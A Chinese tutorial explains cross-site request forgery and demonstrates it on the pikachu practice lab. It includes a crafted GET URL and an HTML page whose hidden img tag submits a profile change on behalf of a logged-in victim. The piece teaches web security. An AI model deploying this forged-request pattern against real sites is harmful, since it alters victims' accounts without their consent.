CSRF:跨站请求伪造原理与实例

原理:

1 现有a和b两个网站,其中a网站为受害者常用网站,网站内存在csrf漏洞。b网站为攻击者网站,存在恶意代码

2 当受害者登录a网站并保存了该网站的cookie,在未退出登录的情况下,点击攻击者发送的链接,跳转到攻击者所创建的网站

3 进入攻击者网站时,触发网站中的恶意代码,使攻击者,伪装成受害者所在网站的账户,进行操作

GET类型实例pikachu

实现更改用户信息

1.登录lili用户

2.编辑用户信息并提交

3.由于提交过后会直接跳转,此处使用bp,抓包查看提交参数:在提交时断网也可在url中看见

4.复制接口地址,并拼接url

http://121.40.54.224:81/pikachu-master/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=lili\&phonenum=18656565545\&add=10ss\&email=lili%40pikachu.com\&submit=submit

5.编写前端脚本

使用img标签,使加载时携带指定参数向接口发送请求

html 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://121.40.54.224:81/pikachu-master/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=lili&phonenum=18656565545&add=10ss&email=lili%40pikachu.com&submit=submit">
</body>
</html>

6.访问攻击者网站,实现攻击

<1.用户点击链接

<2.进入网站,触发图片加载,向接口发送请求,实现修改数据

用户正常使用与攻击者网页发送的请求,进行cookie的比较,其cookie值相同

相关推荐
Charonmomo19 分钟前
react/antd - 不能正确打开标签页问题记录
前端·react.js·前端框架
冬枳38 分钟前
基于OpenSeagragon封装的前端病理切片展示组件
前端·typescript
BenSmith39 分钟前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
Dola_Zou1 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
爱勇宝1 小时前
《道德经》第6章:别把团队的创造力用到枯竭
前端·后端
无双_Joney2 小时前
[四期 - 4] NestJS专栏 - 征召一下大家的意见,非常想知道大家都想看看Nest的哪些方面
前端·后端·nestjs
彭亚川Allen2 小时前
停更的这一年,All In AI、陪媳妇生娃、还考了个研
前端·后端·产品经理
爱分享的程序猿-Clark2 小时前
【前端开发】前端开发者如何使用 Claude Code 快速搭建 React 项目!(小白都能学会的教程)
前端·react.js
小小小小钰儿2 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
_kerneler2 小时前
cgroup :限制cpu原理
java·服务器·前端